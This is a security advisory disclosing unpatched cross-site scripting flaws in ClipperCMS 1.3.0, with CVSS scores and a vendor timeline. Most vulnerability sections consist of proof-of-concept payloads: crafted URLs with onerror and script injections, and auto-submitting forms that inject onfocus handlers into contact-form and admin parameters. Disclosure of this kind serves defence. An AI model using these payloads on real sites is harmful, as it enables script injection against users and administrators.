ClipperCMS 1.3.0: XSS
Date: 2015-11-13 11:42:15
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: |
ClipperCMS 1.3.0 |
Fixed in: |
not fixed |
Fixed Version Link: |
n/a |
Vendor Website: |
http://www.clippercms.com/ |
Vulnerability Type: |
XSS |
Remote Exploitable: |
Yes |
Reported to vendor: |
10/02/2015 |
Disclosed to public: |
11/13/2015 |
Release mode: |
Full Disclosure |
CVE: |
n/a |
Credits |
Tim Coen of curesec GmbH |
2. Overview
There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require specific non-default settings, while others do not require these settings.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar<img src=no onerror=alert(1)>
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
The name, email, message, and subjected parameter of the Contact form are vulnerable to XSS.
Contrary to the XSS issues in the admin area described below, these XSS work without clickjacking or specific settings regarding referers.
Proof of Concept
The POCs for name and subjected are equivalent to this POC for email:
<html>
<body>
<form action="http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6" method="POST">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="email" value="test@example.com"onfocus="alert(1)"autofocus="" />
<input type="hidden" name="subjected" value="test" />
<input type="hidden" name="message" value="test" />
<input type="hidden" name="submit" value="Send" />
<input type="hidden" name="formid" value="contactform" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
POC for message:
<html>
<body>
<form action="http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6" method="POST">
<input type="hidden" name="name" value="test"onfocus="alert(1)"autofocus="" />
<input type="hidden" name="email" value="test@example.com"onfocus" />
<input type="hidden" name="subjected" value="test"onfocus="alert(1)"autofocus="" />
<input type="hidden" name="message" value="test"></textarea><script>alert(1)</script>" />
<input type="hidden" name="submit" value="Send" />
<input type="hidden" name="formid" value="contactform" />
<input type="submit" value="Submit request" />
</form>
</body>
5. XSS 3
CVSS
Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description
The search field of the System Events page is vulnerable to XSS. To execute the provided POC, the setting "Validate HTTP_REFERER headers" should be set to false. Please note that it is likely possible to exploit this issue via ClickJacking even if that setting is set to true.
Proof of Concept
<html>
<body>
<form action="http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="listmode" value="" />
<input type="hidden" name="op" value="" />
<input type="hidden" name="search" value="" autofocus onfocus="alert(1)" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. XSS 4ff
CVSS
Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description
Multiple parameters of various components of the admin area are vulnerable to XSS.
To execute these POC, the setting "Validate HTTP_REFERER headers" should be set to false.
Proof of Concept
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function foo(){doRefresh(
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var bar='
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88"><img src=no onerror=alert(1)>&id=1
http://localhostClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode="><img src=no onerror=alert(1)>&op=&search=test
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1"><img src=no onerror=alert(1)>
7. Solution
This issue has not been fixed by the vendor.
8. Report Timeline
10/02/2015 |
Informed Vendor about Issue (no reply) |
10/21/2015 |
Reminded Vendor of Disclosure Date (no reply) |
11/13/2015 |
Disclosed to public |